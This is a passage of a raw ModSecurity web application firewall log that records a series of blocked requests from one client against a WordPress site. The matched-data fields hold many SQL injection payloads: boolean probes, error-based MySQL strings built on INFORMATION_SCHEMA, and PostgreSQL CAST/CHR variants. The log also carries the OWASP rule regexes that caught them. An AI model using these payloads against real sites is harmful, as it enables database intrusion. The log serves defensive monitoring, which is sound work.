?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "136"] [id "959072"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: AND 7660= found within ARGS:ver: ) AND 7660=7660 AND (6874=6874"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMoySCXpUXSc3dPnIU5gAAAI8"] [Sun Aug 18 00:54:43.336745 2024] [:error] [pid 25551:tid 140111094216448] [client 92.51.2.78:60648] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=]|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[<>]|\\\\band\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "136"] [id "959072"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: AND 4418= found within ARGS:ver: AND 4418=9781"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMoySCXpUXSc3dPnIU5wAAAIM"] [Sun Aug 18 00:54:43.615934 2024] [:error] [pid 26175:tid 140111060645632] [client 92.51.2.78:60650] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=]|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[<>]|\\\\band\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "136"] [id "959072"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: AND 7660= found within ARGS:ver: AND 7660=7660"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMo0usHEVNaz1QkYN6RgAAAMc"] [Sun Aug 18 00:54:43.745255 2024] [:error] [pid 26175:tid 140111069038336] [client 92.51.2.78:60652] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=]|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[<>]|\\\\band\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "136"] [id "959072"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: AND 3389= found within ARGS:ver: ') AND 3389=7087 AND ('cfUP'='cfUP"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMo0usHEVNaz1QkYN6RwAAAMY"] [Sun Aug 18 00:54:43.974355 2024] [:error] [pid 26175:tid 140111077431040] [client 92.51.2.78:60654] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=]|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[<>]|\\\\band\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "136"] [id "959072"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: AND 7660= found within ARGS:ver: ') AND 7660=7660 AND ('yFAV'='yFAV"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMo0usHEVNaz1QkYN6SAAAAMU"] [Sun Aug 18 00:54:44.259227 2024] [:error] [pid 26175:tid 140110985111296] [client 92.51.2.78:60656] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=]|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[<>]|\\\\band\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "136"] [id "959072"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: AND 4000= found within ARGS:ver: ' AND 4000=9155 AND 'TBZA'='TBZA"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMpEusHEVNaz1QkYN6SQAAANA"] [Sun Aug 18 00:54:44.622652 2024] [:error] [pid 26175:tid 140111018682112] [client 92.51.2.78:60658] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=]|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[<>]|\\\\band\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "136"] [id "959072"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: AND 7660= found within ARGS:ver: ' AND 7660=7660 AND 'EARa'='EARa"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMpEusHEVNaz1QkYN6SgAAAMw"] [Sun Aug 18 00:54:44.860867 2024] [:error] [pid 26175:tid 140111052252928] [client 92.51.2.78:60660] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=]|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[<>]|\\\\band\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "136"] [id "959072"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: AND 9257= found within ARGS:ver: %' AND 9257=6910 AND '%'='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMpEusHEVNaz1QkYN6SwAAAMg"] [Sun Aug 18 00:54:45.200162 2024] [:error] [pid 26175:tid 140110943147776] [client 92.51.2.78:60662] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=]|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[<>]|\\\\band\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "136"] [id "959072"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: AND 7660= found within ARGS:ver: %' AND 7660=7660 AND '%'='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMpUusHEVNaz1QkYN6TAAAANU"] [Sun Aug 18 00:54:45.453532 2024] [:error] [pid 26175:tid 140110926362368] [client 92.51.2.78:60664] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=]|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[<>]|\\\\band\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "136"] [id "959072"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: AND 6743= found within ARGS:ver: AND 6743=5189-- LQGr"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMpUusHEVNaz1QkYN6TQAAANc"] [Sun Aug 18 00:54:45.949534 2024] [:error] [pid 26175:tid 140110917969664] [client 92.51.2.78:60666] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=]|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[<>]|\\\\band\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "136"] [id "959072"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: AND 7660= found within ARGS:ver: AND 7660=7660-- CONd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMpUusHEVNaz1QkYN6TgAAANg"] [Sun Aug 18 00:54:46.397671 2024] [:error] [pid 26175:tid 140110951540480] [client 92.51.2.78:60668] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMpkusHEVNaz1QkYN6TwAAANQ"] [Sun Aug 18 00:54:46.533531 2024] [:error] [pid 26175:tid 140111027074816] [client 92.51.2.78:60670] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMpkusHEVNaz1QkYN6UAAAAMs"] [Sun Aug 18 00:54:47.087303 2024] [:error] [pid 25549:tid 140111060645632] [client 92.51.2.78:60672] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\A|[^\\\\d])0x[a-f\\\\d]{3,}[a-f\\\\d]*)+" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "55"] [id "981260"] [rev "2"] [msg "SQL Hex Encoding Identified"] [data "Matched Data: (0x7178786271 found within ARGS:ver: ) AND (SELECT 5366 FROM(SELECT COUNT(*),CONCAT(0x7178786271,(SELECT (ELT(5366=5366,1))),0x7170707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (8413=8413"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMp5VyS4wZaDPTA77mNQAAAAc"] [Sun Aug 18 00:54:47.682506 2024] [:error] [pid 26175:tid 140111191197440] [client 92.51.2.78:60674] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\A|[^\\\\d])0x[a-f\\\\d]{3,}[a-f\\\\d]*)+" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "55"] [id "981260"] [rev "2"] [msg "SQL Hex Encoding Identified"] [data "Matched Data: (0x7178786271 found within ARGS:ver: AND (SELECT 5366 FROM(SELECT COUNT(*),CONCAT(0x7178786271,(SELECT (ELT(5366=5366,1))),0x7170707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMp0usHEVNaz1QkYN6UQAAAMA"] [Sun Aug 18 00:54:47.862106 2024] [:error] [pid 26175:tid 140111010289408] [client 92.51.2.78:60676] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\A|[^\\\\d])0x[a-f\\\\d]{3,}[a-f\\\\d]*)+" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "55"] [id "981260"] [rev "2"] [msg "SQL Hex Encoding Identified"] [data "Matched Data: (0x7178786271 found within ARGS:ver: ') AND (SELECT 5366 FROM(SELECT COUNT(*),CONCAT(0x7178786271,(SELECT (ELT(5366=5366,1))),0x7170707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('vUyg'='vUyg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMp0usHEVNaz1QkYN6UgAAAM0"] [Sun Aug 18 00:54:48.200637 2024] [:error] [pid 26175:tid 140111174412032] [client 92.51.2.78:60678] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\A|[^\\\\d])0x[a-f\\\\d]{3,}[a-f\\\\d]*)+" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "55"] [id "981260"] [rev "2"] [msg "SQL Hex Encoding Identified"] [data "Matched Data: (0x7178786271 found within ARGS:ver: ' AND (SELECT 5366 FROM(SELECT COUNT(*),CONCAT(0x7178786271,(SELECT (ELT(5366=5366,1))),0x7170707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Lfzx'='Lfzx"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMqEusHEVNaz1QkYN6UwAAAMI"] [Sun Aug 18 00:54:48.933660 2024] [:error] [pid 25549:tid 140111018682112] [client 92.51.2.78:60680] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\A|[^\\\\d])0x[a-f\\\\d]{3,}[a-f\\\\d]*)+" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "55"] [id "981260"] [rev "2"] [msg "SQL Hex Encoding Identified"] [data "Matched Data: (0x7178786271 found within ARGS:ver: %' AND (SELECT 5366 FROM(SELECT COUNT(*),CONCAT(0x7178786271,(SELECT (ELT(5366=5366,1))),0x7170707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMqJVyS4wZaDPTA77mNgAAAAw"] [Sun Aug 18 00:54:49.074539 2024] [:error] [pid 25549:tid 140111043860224] [client 92.51.2.78:60682] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\A|[^\\\\d])0x[a-f\\\\d]{3,}[a-f\\\\d]*)+" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "55"] [id "981260"] [rev "2"] [msg "SQL Hex Encoding Identified"] [data "Matched Data: (0x7178786271 found within ARGS:ver: AND (SELECT 5366 FROM(SELECT COUNT(*),CONCAT(0x7178786271,(SELECT (ELT(5366=5366,1))),0x7170707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- BluY"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMqZVyS4wZaDPTA77mNwAAAAk"] [Sun Aug 18 00:54:49.339332 2024] [:error] [pid 25549:tid 140111191197440] [client 92.51.2.78:60684] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: ) AND 1006=CAST((CHR(113)||CHR(120)||CHR(120)||CHR(98)||CHR(113))||(SELECT (CASE WHEN (1006=1006) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(112)||CHR(112)||CHR(113)||CHR(113)) AS NUMERIC) AND (2234=2234"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMqZVyS4wZaDPTA77mOAAAAAA"] [Sun Aug 18 00:54:49.469311 2024] [:error] [pid 25551:tid 140111010289408] [client 92.51.2.78:60686] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: AND 1006=CAST((CHR(113)||CHR(120)||CHR(120)||CHR(98)||CHR(113))||(SELECT (CASE WHEN (1006=1006) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(112)||CHR(112)||CHR(113)||CHR(113)) AS NUMERIC)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMqSSCXpUXSc3dPnIU6AAAAI0"] [Sun Aug 18 00:54:49.596956 2024] [:error] [pid 25551:tid 140110951540480] [client 92.51.2.78:60688] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: ') AND 1006=CAST((CHR(113)||CHR(120)||CHR(120)||CHR(98)||CHR(113))||(SELECT (CASE WHEN (1006=1006) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(112)||CHR(112)||CHR(113)||CHR(113)) AS NUMERIC) AND ('mkBn'='mkBn"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMqSSCXpUXSc3dPnIU6QAAAJQ"] [Sun Aug 18 00:54:49.729280 2024] [:error] [pid 25550:tid 140111060645632] [client 92.51.2.78:60690] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match 